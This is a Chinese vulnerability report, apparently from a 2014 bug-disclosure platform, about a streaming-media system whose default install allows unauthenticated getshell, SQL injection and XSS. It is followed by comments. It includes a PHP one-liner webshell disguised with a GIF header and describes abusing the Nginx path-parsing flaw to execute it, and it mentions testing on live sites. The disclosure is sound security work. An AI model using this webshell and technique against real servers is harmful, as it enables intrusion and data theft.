某流媒体系统直接Getshell（无需登录，注入，XSS）

官方站点

http://**.**.**.**/

系统好像叫：

KMS(3149).rar >>>下载地址：>>>http://**.**.**.**/LmzTxH

这套系统一键环境安装，（本地安装测试通过）

而安装后默认配置不当，导致一些问题。首先环境为：

Nginx         => 0.9.6
 PHP           => 5.2.6
 MySQL         => 5.0.51b
 PHPMyAdmin    => **.**.**.**
 eAccelerator  => **.**.**.**
 ZendOptimizer => 3.3.3
 OpenSSL       => 0.9.8h

安装后界面如图：

1.目录遍历（敏感目录）：

2.直接Getshell

上传只允许图片上传，且验证头文件，由于环境配置导致一些shell报错，图片一句话绕过

gif89a<?php @eval($_POST[a]);?>

上传，利用Nginx解析漏洞,网址绝对路径后a.php成功拿到shell：

而且是管理员权限，也省的提权了。

这个比较严重啊，注入，后台都不用了。然后数据，内网服务器，都面临威胁。去谷歌搜了一下，试了几个都可以成功。有些学校用的都是这个。。。

附上AWVS没有扫描完的一张图，SQL注入,XSS。。。

你们都是专业的。

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2014-10-11 10:41

厂商回复：

最新状态：

暂无

1. 2014-10-02 13:30 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   1

   有一些人整天在网上黑网站，遇到个人信息下载下来卖钱，遇到密码就放在自己的密码库里用来盗号，这样很不道德，是不对的。我是不一样的，我会立即告诉对方，导致漏洞的问题可能出在哪里，如果已经公布了源代码，我会直接将修补漏洞的文件传过去。

   1# 回复此人

2. 2014-10-02 18:23 | In_Sunday ( 路人 | 还没有发布任何漏洞 | like sun)

   1

   @雷锋 你是雷锋派来的逗比么哈哈哈

   2# 回复此人

3. 2014-10-02 19:07 | depycode ( 普通白帽子 | Rank:299 漏洞数:51 | 关注网络安全，提高技术！)

   0

   国庆审核都不休息啊？？

   3# 回复此人

4. 2014-10-02 23:44 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

   1

   上传接口么

   4# 回复此人

5. 2014-10-03 16:09 | 奋斗的猴子 ( 路人 | 还没有发布任何漏洞 | IT界的一名屌丝)

   1

   楼主果然是雷锋啊！

   5# 回复此人